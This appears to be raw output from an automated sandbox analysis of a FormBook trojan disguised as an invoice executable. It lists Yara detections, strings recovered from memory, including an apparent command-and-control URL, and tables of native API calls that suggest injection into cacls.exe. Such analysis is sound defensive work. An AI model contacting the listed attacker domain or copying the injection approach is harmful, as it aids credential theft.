Source: cacls.exe, 0000000C.00000002.4653682841.0000000004326000.00000004.10000000.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000E.00000002.4650779219.0000000002DD6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: cacls.exe, 0000000C.00000002.4653682841.000000000496E000.00000004.10000000.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000E.00000002.4650779219.000000000341E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://github.com/necolas/normalize.css
Source: fXZvHKoWCzop.exe, 0000000E.00000002.4648426160.00000000008DF000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.hellogus.online
Source: fXZvHKoWCzop.exe, 0000000E.00000002.4648426160.00000000008DF000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.hellogus.online/zrnp/
Source: cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cacls.exe, 0000000C.00000002.4647612526.0000000003192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: cacls.exe, 0000000C.00000003.3260416485.00000000082C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: cacls.exe, 0000000C.00000002.4647612526.00000000031B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: cacls.exe, 0000000C.00000002.4647612526.00000000031B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: cacls.exe, 0000000C.00000002.4647612526.00000000031B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: cacls.exe, 0000000C.00000002.4647612526.0000000003192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: cacls.exe, 0000000C.00000002.4647612526.00000000031B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: cacls.exe, 0000000C.00000002.4647612526.0000000003192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.FACTURA 24V70 VINS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.FACTURA 24V70 VINS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4650294834.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4650098497.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4648426160.0000000000880000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3039119542.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3038070342.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.FACTURA 24V70 VINS.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.FACTURA 24V70 VINS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.4650294834.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.4650098497.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.4648426160.0000000000880000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.3039119542.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.3038070342.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07600804 NtQueryInformationProcess,	1_2_07600804
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07605F68 NtQueryInformationProcess,	1_2_07605F68
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0042C5F3 NtClose,	3_2_0042C5F3
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772B60 NtClose,LdrInitializeThunk,	3_2_01772B60
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_01772DF0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_01772C70
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017735C0 NtCreateMutant,LdrInitializeThunk,	3_2_017735C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01774340 NtSetContextThread,	3_2_01774340
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01774650 NtSuspendThread,	3_2_01774650
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772BF0 NtAllocateVirtualMemory,	3_2_01772BF0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772BE0 NtQueryValueKey,	3_2_01772BE0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772BA0 NtEnumerateValueKey,	3_2_01772BA0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772B80 NtQueryInformationFile,	3_2_01772B80
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772AF0 NtWriteFile,	3_2_01772AF0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772AD0 NtReadFile,	3_2_01772AD0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772AB0 NtWaitForSingleObject,	3_2_01772AB0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772D30 NtUnmapViewOfSection,	3_2_01772D30
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772D10 NtMapViewOfSection,	3_2_01772D10
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772D00 NtSetInformationFile,	3_2_01772D00
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772DD0 NtDelayExecution,	3_2_01772DD0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772DB0 NtEnumerateKey,	3_2_01772DB0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772C60 NtCreateKey,	3_2_01772C60
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772C00 NtQueryInformationProcess,	3_2_01772C00
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772CF0 NtOpenProcess,	3_2_01772CF0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772CC0 NtQueryVirtualMemory,	3_2_01772CC0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772CA0 NtQueryInformationToken,	3_2_01772CA0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772F60 NtCreateProcessEx,	3_2_01772F60
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772F30 NtCreateSection,	3_2_01772F30
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772FE0 NtCreateFile,	3_2_01772FE0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772FB0 NtResumeThread,	3_2_01772FB0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772FA0 NtQuerySection,	3_2_01772FA0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772F90 NtProtectVirtualMemory,	3_2_01772F90
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772E30 NtWriteVirtualMemory,	3_2_01772E30
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772EE0 NtQueueApcThread,	3_2_01772EE0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772EA0 NtAdjustPrivilegesToken,	3_2_01772EA0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772E80 NtReadVirtualMemory,	3_2_01772E80
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01773010 NtOpenDirectoryObject,	3_2_01773010
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01773090 NtSetValueKey,	3_2_01773090
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017739B0 NtGetContextThread,	3_2_017739B0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01773D70 NtOpenThread,	3_2_01773D70
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01773D10 NtOpenProcessToken,	3_2_01773D10
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03744340 NtSetContextThread,LdrInitializeThunk,	12_2_03744340
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03744650 NtSuspendThread,LdrInitializeThunk,	12_2_03744650
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742B60 NtClose,LdrInitializeThunk,	12_2_03742B60
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	12_2_03742BF0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742BE0 NtQueryValueKey,LdrInitializeThunk,	12_2_03742BE0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742BA0 NtEnumerateValueKey,LdrInitializeThunk,	12_2_03742BA0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742AF0 NtWriteFile,LdrInitializeThunk,	12_2_03742AF0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742AD0 NtReadFile,LdrInitializeThunk,	12_2_03742AD0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742F30 NtCreateSection,LdrInitializeThunk,	12_2_03742F30
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742FE0 NtCreateFile,LdrInitializeThunk,	12_2_03742FE0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742FB0 NtResumeThread,LdrInitializeThunk,	12_2_03742FB0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742EE0 NtQueueApcThread,LdrInitializeThunk,	12_2_03742EE0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742E80 NtReadVirtualMemory,LdrInitializeThunk,	12_2_03742E80
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742D30 NtUnmapViewOfSection,LdrInitializeThunk,	12_2_03742D30
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742D10 NtMapViewOfSection,LdrInitializeThunk,	12_2_03742D10
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742DF0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_03742DF0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742DD0 NtDelayExecution,LdrInitializeThunk,	12_2_03742DD0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742C70 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_03742C70
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742C60 NtCreateKey,LdrInitializeThunk,	12_2_03742C60
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742CA0 NtQueryInformationToken,LdrInitializeThunk,	12_2_03742CA0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037435C0 NtCreateMutant,LdrInitializeThunk,	12_2_037435C0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037439B0 NtGetContextThread,LdrInitializeThunk,	12_2_037439B0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742B80 NtQueryInformationFile,	12_2_03742B80
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742AB0 NtWaitForSingleObject,	12_2_03742AB0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742F60 NtCreateProcessEx,	12_2_03742F60
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742FA0 NtQuerySection,	12_2_03742FA0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742F90 NtProtectVirtualMemory,	12_2_03742F90
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742E30 NtWriteVirtualMemory,	12_2_03742E30
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742EA0 NtAdjustPrivilegesToken,	12_2_03742EA0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742D00 NtSetInformationFile,	12_2_03742D00
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742DB0 NtEnumerateKey,	12_2_03742DB0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742C00 NtQueryInformationProcess,	12_2_03742C00
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742CF0 NtOpenProcess,	12_2_03742CF0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742CC0 NtQueryVirtualMemory,	12_2_03742CC0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03743010 NtOpenDirectoryObject,	12_2_03743010
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03743090 NtSetValueKey,	12_2_03743090
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03743D70 NtOpenThread,	12_2_03743D70
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03743D10 NtOpenProcessToken,	12_2_03743D10
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DB8F20 NtCreateFile,	12_2_02DB8F20
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DB9220 NtClose,	12_2_02DB9220
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DB9390 NtAllocateVirtualMemory,	12_2_02DB9390
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DB9090 NtReadFile,	12_2_02DB9090
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DB9180 NtDeleteFile,	12_2_02DB9180

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_0150DC4C	1_2_0150DC4C
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_02F948C0	1_2_02F948C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_02F90040	1_2_02F90040
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_02F90006	1_2_02F90006
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_02F90478	1_2_02F90478
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_02F90469	1_2_02F90469
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_02F90E28	1_2_02F90E28
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056E9D18	1_2_056E9D18
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056ECCA6	1_2_056ECCA6
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056ED7D8	1_2_056ED7D8
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056E7CE0	1_2_056E7CE0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056E7CD0	1_2_056E7CD0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_076032B0	1_2_076032B0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07601FE0	1_2_07601FE0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_0760BA58	1_2_0760BA58
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_0760E75C	1_2_0760E75C
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_076053C8	1_2_076053C8
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_076032AB	1_2_076032AB
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07606138	1_2_07606138
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07607F73	1_2_07607F73
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07607F78	1_2_07607F78
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07601FDB	1_2_07601FDB
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07604F83	1_2_07604F83
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07607D03	1_2_07607D03
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07607D08	1_2_07607D08
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_0760EBC8	1_2_0760EBC8
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_0760EBB8	1_2_0760EBB8
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07605888	1_2_07605888
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626084	1_2_07626084
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07627553	1_2_07627553
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626078	1_2_07626078
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_004186C3	3_2_004186C3
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0041685D	3_2_0041685D
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0041689E	3_2_0041689E
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_004168A3	3_2_004168A3
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_00403130	3_2_00403130
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_004101D3	3_2_004101D3
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0040E253	3_2_0040E253
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_00401210	3_2_00401210
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_004023B0	3_2_004023B0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0042EC13	3_2_0042EC13
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_00402560	3_2_00402560
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0040FFAA	3_2_0040FFAA
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0040FFB3	3_2_0040FFB3
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017C8158	3_2_017C8158
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_018001AA	3_2_018001AA
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DA118	3_2_017DA118
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01730100	3_2_01730100
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F81CC	3_2_017F81CC
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F41A2	3_2_017F41A2
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017D2000	3_2_017D2000
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FA352	3_2_017FA352
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_018003E6	3_2_018003E6
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0174E3F0	3_2_0174E3F0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E0274	3_2_017E0274
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017C02C0	3_2_017C02C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01800591	3_2_01800591
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01740535	3_2_01740535
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F2446	3_2_017F2446
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E4420	3_2_017E4420
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017EE4F6	3_2_017EE4F6
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01740770	3_2_01740770
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01764750	3_2_01764750
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0173C7C0	3_2_0173C7C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175C6E0	3_2_0175C6E0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01756962	3_2_01756962
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0180A9A6	3_2_0180A9A6
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017429A0	3_2_017429A0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0174A840	3_2_0174A840
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01742840	3_2_01742840
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176E8F0	3_2_0176E8F0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017268B8	3_2_017268B8
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FAB40	3_2_017FAB40
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F6BD7	3_2_017F6BD7
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0173EA80	3_2_0173EA80
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DCD1F	3_2_017DCD1F
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0174AD00	3_2_0174AD00
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0173ADE0	3_2_0173ADE0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01758DBF	3_2_01758DBF
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01740C00	3_2_01740C00
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01730CF2	3_2_01730CF2
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E0CB5	3_2_017E0CB5
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B4F40	3_2_017B4F40
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01760F30	3_2_01760F30
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E2F30	3_2_017E2F30
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01782F28	3_2_01782F28
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0174CFE0	3_2_0174CFE0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01732FC8	3_2_01732FC8
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017BEFA0	3_2_017BEFA0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01740E59	3_2_01740E59
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FEE26	3_2_017FEE26
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FEEDB	3_2_017FEEDB
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01752E90	3_2_01752E90
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FCE93	3_2_017FCE93
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0172F172	3_2_0172F172
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0177516C	3_2_0177516C
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0174B1B0	3_2_0174B1B0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0180B16B	3_2_0180B16B
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F70E9	3_2_017F70E9
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FF0E0	3_2_017FF0E0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017EF0CC	3_2_017EF0CC
